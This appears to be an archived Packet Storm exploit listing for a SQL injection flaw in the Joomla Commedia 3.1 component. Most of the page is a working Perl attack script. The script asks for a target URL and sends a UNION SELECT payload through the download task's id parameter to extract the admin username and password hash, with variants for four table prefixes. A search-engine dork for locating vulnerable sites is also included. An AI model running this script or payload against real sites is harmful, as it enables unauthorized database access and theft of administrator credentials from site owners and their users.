what you don't know can hurt you

Joomla Commedia 3.1 SQL Injection

Joomla Commedia 3.1 SQL Injection
Posted Oct 19, 2012
Authored by Daniel Barragan

Joomla Commedia component version 3.1 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 95a12eb7153ed1fd6ec079e257774398

Joomla Commedia 3.1 SQL Injection

Change Mirror Download
 Exploit Title: Joomla commedia Remote Exploit

dork: inurl:index.php?option=com_commedia

Date: [18-10-2012]

Author: Daniel Barragan "D4NB4R"

Twitter: @D4NB4R

Vendor: http://www.ecolora.org/

Version: 3.1 (last update on Oct 7, 2012) and lowers

License: Commercial and Non-Commercial, affects 2 versions

Demo: http://www.ecolora.org/index.php/demo/commedia

Download: http://ecolora.com/index.php/programmy/file/5-plagin-mp3browser-dlya-muzykalnykh-satov-na-joomla-15

Tested on: [Linux(bt5)-Windows(7ultimate)]

Especial greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Descripcion:

Commedia - a component and content plugin that allows you to create a content table containing all of the MP3's that are present in any directory of your site, a FTP-server (folder, single path to ftp-file) or a HTTP(S)-server (DROPBOX, folder, single path to http-file or http-radio).


Exploit:

#!/usr/bin/perl -w
########################################
# Joomla Component (commedia) Remote SQL Exploit
#----------------------------------------------------------------------------#
########################################
print "\t\t\n\n";
print "\t\n";
print "\t Daniel Barragan D4NB4R \n";
print "\t \n";
print "\t Joomla com_commedia Remote Sql Exploit \n";
print "\t\n\n";
print " :::Opciones de prefijo tabla users:::\n\n";
print " 1. jos_users 2. jml_users 3. muc_users 4. sgj_users \n\n\n";

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print ":::Opcion::: ";
my $option=<STDIN>;
if ($option==1){&jos_users}
if ($option==2){&jml_users}
if ($option==3){&muc_users}
if ($option==4){&sgj_users}


sub jos_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$table="jos_users";
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub jml_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$table="jml_users";
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub muc_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$table="muc_users";
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub sgj_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$table="sgj_users";
$d4n="com_commedia&format";
$parametro="down&pid=59&id";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n

* Admin User : $1";

}

if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}


_____________________________________________________
Daniel Barragan "D4NB4R" 2012


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close